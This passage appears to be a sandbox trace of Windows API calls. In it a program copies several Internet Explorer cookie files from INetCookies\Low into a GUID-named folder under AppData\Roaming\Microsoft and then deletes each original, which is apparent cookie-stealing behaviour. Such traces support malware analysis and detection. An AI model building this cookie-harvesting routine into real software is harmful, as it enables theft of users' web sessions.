lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0253.120] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0253.120] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0253.120] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0253.120] StrChrW (lpStart="Low\\WPEXKTDV.txt", wMatch=0x74c005c) returned="\\WPEXKTDV.txt" [0253.120] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0253.121] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0253.121] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0253.121] StrChrW (lpStart="WPEXKTDV.txt", wMatch=0x74c005c) returned 0x0 [0253.121] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="WPEXKTDV.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\WPEXKTDV.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\WPEXKTDV.txt" [0253.121] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\WPEXKTDV.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\wpexktdv.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\WPEXKTDV.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\wpexktdv.txt"), bFailIfExists=0) returned 1 [0253.126] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\WPEXKTDV.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\wpexktdv.txt")) returned 1 [0253.127] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0253.127] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0253.127] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0253.127] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0253.127] StrChrW (lpStart="Low\\WUT8M1Q8.txt", wMatch=0x74c005c) returned="\\WUT8M1Q8.txt" [0253.127] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0253.127] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0253.127] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0253.127] StrChrW (lpStart="WUT8M1Q8.txt", wMatch=0x74c005c) returned 0x0 [0253.127] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="WUT8M1Q8.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\WUT8M1Q8.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\WUT8M1Q8.txt" [0253.127] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\WUT8M1Q8.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\wut8m1q8.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\WUT8M1Q8.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\wut8m1q8.txt"), bFailIfExists=0) returned 1 [0253.132] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\WUT8M1Q8.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\wut8m1q8.txt")) returned 1 [0253.133] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0253.133] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0253.133] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0253.133] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0253.133] StrChrW (lpStart="Low\\WX75TEOR.txt", wMatch=0x74c005c) returned="\\WX75TEOR.txt" [0253.133] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0253.133] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0253.134] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0253.134] StrChrW (lpStart="WX75TEOR.txt", wMatch=0x74c005c) returned 0x0 [0253.134] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="WX75TEOR.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\WX75TEOR.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\WX75TEOR.txt" [0253.134] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\WX75TEOR.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\wx75teor.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\WX75TEOR.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\wx75teor.txt"), bFailIfExists=0) returned 1 [0253.139] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\WX75TEOR.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\wx75teor.txt")) returned 1 [0253.139] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0253.140] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0253.140] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0253.140] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0253.140] StrChrW (lpStart="Low\\XRS5D0N2.txt", wMatch=0x74c005c) returned="\\XRS5D0N2.txt" [0253.140] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0253.140] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0253.140] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0253.140] StrChrW (lpStart="XRS5D0N2.txt", wMatch=0x74c005c) returned 0x0 [0253.140] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="XRS5D0N2.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\XRS5D0N2.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\XRS5D0N2.txt" [0253.140] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\XRS5D0N2.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\xrs5d0n2.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\XRS5D0N2.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\xrs5d0n2.txt"), bFailIfExists=0) returned 1 [0253.174] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\XRS5D0N2.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\xrs5d0n2.txt")) returned 1 [0253.175] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0253.175] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0253.175] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0253.175] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0253.175] StrChrW (lpStart="Low\\XUAUK5R0.txt", wMatch=0x74c005c) returned="\\XUAUK5R0.txt" [0253.175] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0253.175] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0253.175] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0253.175] StrChrW (lpStart="XUAUK5R0.txt", wMatch=0x74c005c) returned 0x0 [0253.175] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="XUAUK5R0.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\XUAUK5R0.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\XUAUK5R0.txt" [0253.175] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\XUAUK5R0.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\xuauk5r0.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\XUAUK5R0.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\xuauk5r0.txt"), bFailIfExists=0) returned 1 [0253.181] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\XUAUK5R0.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\xuauk5r0.txt")) returned 1 [0253.183] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0253.183] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0253.183] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0253.183] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0253.183] StrChrW (lpStart="Low\\Y1I415YS.txt", wMatch=0x74c005c) returned="\\Y1I415YS.txt" [0253.183] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0253.183] CreateDirectoryW 